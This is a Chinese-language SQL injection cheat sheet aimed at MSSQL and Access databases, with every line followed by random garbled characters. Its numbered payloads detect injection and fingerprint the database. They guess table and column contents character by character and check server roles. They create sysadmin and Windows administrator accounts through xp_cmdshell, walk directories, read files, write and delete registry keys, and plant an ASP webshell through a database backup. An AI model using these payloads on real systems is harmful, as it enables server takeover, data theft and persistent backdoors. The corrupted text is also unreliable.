1.判断是否有注入;and 1=1 ;and 1=2 #5iwDAw:|r
2.初步判断是否是mssql ;and user>0 �xm�fZ5nVL
.
+,�{|){c
3.注入参数是字符'and [查询条件] and ''=' Cdt�Cxy��5
/-(OJN5�F^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,jl4W��+s
v�N~j�oQ=d
5.判断数据库系统 �q%,y66pFr
!Y/S���2J�
;and (select count(*) from sysobjects)>0 mssql APCE�}%�1U
C^�:��{�y
;and (select count(*) from msysobjects)>0 access ~4xn�^��.w
�,|��j�\x
KTeR;6oZn"
�k`s_�31<�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 0n�={M��b
�Z>��dvt�h
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 r"t,/@�`n�
��7f�<@+&�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �1Ve~P"�w�
�~B�7�<Yg�
9.(1)猜字段的ascii值(access) �W*,$�0� t
0_=^#r4Mu
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 fw��a*|�y;
ZS�`9r16@b
(2)猜字段的ascii值(mssql) �;q#P�l!*5
�Q!�I�>�<u
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 j(M�.�7Z7^
Bw��9�O)++
10.测试权限结构(mssql) Xo�6ze�LHO
-U\s.FI.AR
EoS����6t�
���E?VOst&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ]O0u.=��1k
'aS: �Az�b
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- V >~�\~H2Y
^S�)t;t�@x
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7ZUS�����
�m\_��v{1g
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ' t�^ r2N/
Iv u'0v��F
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Wq?vAnLb�k
8v�=t�-GJW
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +WguW�L�O"
���]��Y$jc
;and 1=(select IS_MEMBER('db_owner'));-- hZ')<@hNP
�N(O*�"1b
tg9{(_�t/W
Zq:c2/\c�}
11.添加mssql和系统的帐户 $�J0o%9K
�
!LsIHDs��4
;exec master.dbo.sp_addlogin username;-- R~;8v�1>K�
;exec master.dbo.sp_password null,username,password;-- PtGFL�M9R�
ke)<E98D�C
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �,�pUB�[w\
�}�*vE/�W
;exec master.dbo.xp_cmdshell 'net user username password Q<y�vp��T(
��t"5ZYa��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- R?C�h8mW.!
��$��2a_!/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ���6z�GeGW
]H<}6}�Gd�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �V�|/N-�3M
�x V�w�1��
�]@CXUa,>a
0�%yP�uY�>
12.(1)遍历目录 w� B�oP&�l
~b%�dBn]n>
;create table dirs(paths varchar(100), id int) �is^�5TL%@
4.>y[_�vu
;insert dirs exec master.dbo.xp_dirtree 'c:\' J?�1Eh14KZ
*|g�l1��S�
;and (select top 1 paths from dirs)>0 P��~PM��$e
&�<c�P{aBa
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) d^0�-|sx��
��E#cu}z�i
|\)Y,~;P�
a�|k*A&5u2
(2)遍历目录 �}{[JS=A^�
�n�;>���r�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- FS�*J8���)
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��"
^!=e72
%H3�iX^}�*
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 UgOhx-���8
ziv+*Qn_b4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 /�74�)c~.W
Gsz$�H_
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 dk�i�3��(�
�V|<'�o<h8
�lQ4$d{m`�
3(:?Z�-iKe
13.mssql中的存储过程 g�+xcKfN{
���{J/+�KK
xp_regenumvalues 注册表根键, 子键 7'ws: #pC�
OUN"'�p%%�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 yv�nv�I�y�
!P6?�n��S�
xp_regread 根键,子键,键值名 ;Q[E>j�?w=
(���v�$
�i
;exec xp_regread �"5<YN�#
wp@6�R�J�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 kc2�
�8Q2
$�MM�[`^~�
xp_regwrite 根键,子键, 值名, 值类型, 值 N�5�tFEV'G
\�[/���}Cy
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Yfy"�;�C7X
QHtN_�Q�_F
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >}d�6)s| �
fr8'�;J�m�
xp_regdeletevalue 根键,子键,值名 $-�\%%n0>6
cVS�ns\QO�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �Gbv�bGEG
Qh]k)]+�*|
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �]|[m�w�C4
\\Z?v,XsS�
Sz���G?�m]
�2\F�'�So
14.mssql的backup创建webshell sBNqg~HwB?
q�}���(�f9
use model dE�3M� ��
M�v:\�T�%]
create table cmd(str image); `*i�:��z�'
�r'�@7aT&_
insert into cmd(str) values (''); f+Fzpd?w�S
d~T@���fa�
backup database model to disk='c:\l.asp'; Q*8�x B�i1
�-�1ci.4F&
v(,YqT>q@U
WWLf�'89It
15.mssql内置函数 ;�h#Q!M&e#
dx.J��v/Mb
;and (select @@version)>0 获得Windows的版本号 %�mOQIXr1s
dd�4^4�X`j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Q{
�{���=
���s1X?]�A
;and (select user_name())>0 爆当前系统的连接用户 f^Q�)��lIv
Q�{~;�4+ZD
;and (select db_name())>0 得到当前连接的数据库 gU?M�/i�2�
tnq Z�l��S
g�$�z6�*bL
+Edq4QY�wR
16.简洁的webshell G%��CS��1#
���p�#�>,{
use model V�! .�I��>
�j��3[k�G#
create table cmd(str image); G�4�20�o}q
Q=ep�UH�Fs
insert into cmd(str) values (''); (T�.�j3@Ko
ixqvX4vv,B
backup database model to disk='g:\wwwtest\l.asp';
